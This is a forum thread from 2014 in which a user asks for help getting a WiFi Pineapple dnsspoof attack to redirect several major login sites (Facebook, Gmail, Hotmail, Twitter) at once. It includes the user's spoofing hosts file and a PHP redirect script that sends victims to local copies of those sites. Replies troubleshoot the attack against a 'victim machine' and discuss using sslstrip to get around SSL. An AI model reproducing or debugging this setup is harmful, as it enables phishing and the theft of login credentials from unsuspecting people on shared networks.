daniboy92 Posted July 11, 2014 Share Posted July 11, 2014 (edited) Hi, After try and try to have a dnsspoof working service i have it. Now i'm trying to spoof multiple webs (facebook, twitter, gmail, hotmail, ebay... etc), but only i can spoof one web, only works with Facebook... Is there a code on browsers or OS that block spoofing web pages? This is my dnsspoof's hosts file: 172.16.42.1 example.com 172.16.42.1 *.facebook.* 172.16.42.1 *.gmail.* 172.16.42.1 *.hotmail.* 172.16.42.1 *.twitter.* And this is my redirect file: <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")){ header('Status: 302 Found'); header('Location: example.html'); } if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebookES'); } if (strpos($ref, "gmail")){ header('Status: 302 Found'); header('Location: gmailES'); } if (strpos($ref, "hotmail")){ header('Status: 302 Found'); header('Location: hotmailES'); } if (strpos($ref, "twitter")){ header('Status: 302 Found'); header('Location: twitterES'); } require('error.php'); ?> The files aren't htm or html, there are shorcuts to the real htm files... But this is not the problem. I don't know if there is something wrong in my Redirect.php file, my hosts file or it's a problem to prevents pineapple spoof varius webs at same time... Edited July 11, 2014 by daniboy92 Quote Link to comment Share on other sites More sharing options...
GnomeProgramming Posted July 11, 2014 Share Posted July 11, 2014 (edited) Try to clean the browser cache of the victim machine and try again. Some times happens to me when the SSL connection is already stablished before I start dnsspoof. Good luck~ Edited July 11, 2014 by GnomeProgramming Quote Link to comment Share on other sites More sharing options...
daniboy92 Posted July 11, 2014 Author Share Posted July 11, 2014 (edited) Try to clean the browser cache of the victim machine and try again. Some times happens to me when the SSL connection is already stablished before I start dnsspoof. Good luck~ I deleted all: cookies, cache, history, downloads... All i can clean in the browser... But only can spoof Facebook.com and example.com Edited July 11, 2014 by daniboy92 Quote Link to comment Share on other sites More sharing options...
GnomeProgramming Posted July 11, 2014 Share Posted July 11, 2014 (edited) Try this: if (strpos($ref, "gmail")){ header('Status: 302 Found'); header('Location: http://www.yolo.com'); } And if It doesn't work try to redirect a website that doesn't use SSL OR/AND try this: https://forums.hak5.org/index.php?/topic/32982-dnsspoof-doesnt-redirect/?p=246490 Edited July 11, 2014 by GnomeProgramming Quote Link to comment Share on other sites More sharing options...
daniboy92 Posted July 13, 2014 Author Share Posted July 13, 2014 (edited) Ok, tried to do this: if (strpos($ref, "gmail")){header('Status: 302 Found');header('Location: http://www.yolo.com');} It doesn't work with gmail, but works fine with marca.com... I think it's because gmail use SSL, someone knows how to use sslstrip with dnsspoof? Edited July 13, 2014 by daniboy92 Quote Link to comment Share on other sites More sharing options...
daniboy92 Posted July 16, 2014 Author Share Posted July 16, 2014 Can someone make a tutorial for use dnsspoof and sslstrip at same time? Quote Link to comment Share on other sites More sharing options...
cheeto Posted July 16, 2014 Share Posted July 16, 2014 ssl strip isn't very effective anymore due to HSTS. As far as I know it doesn't work with: gmail yahoo mail Hotmail. Last time I tried it did work with Facebook though. A video tutorial would be more than welcomed though. Quote Link to comment Share on other sites More sharing options...
daniboy92 Posted July 16, 2014 Author Share Posted July 16, 2014 Thanks cheeto, but i can't spoof webs with ssl protection. I want to remove ssl with sslstrip and try to spoof them. Personally I can't spoof webs like Gmail, Hotmail, PayPal, Ebay... Only Facebook that use ssl. Tell me if you can. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.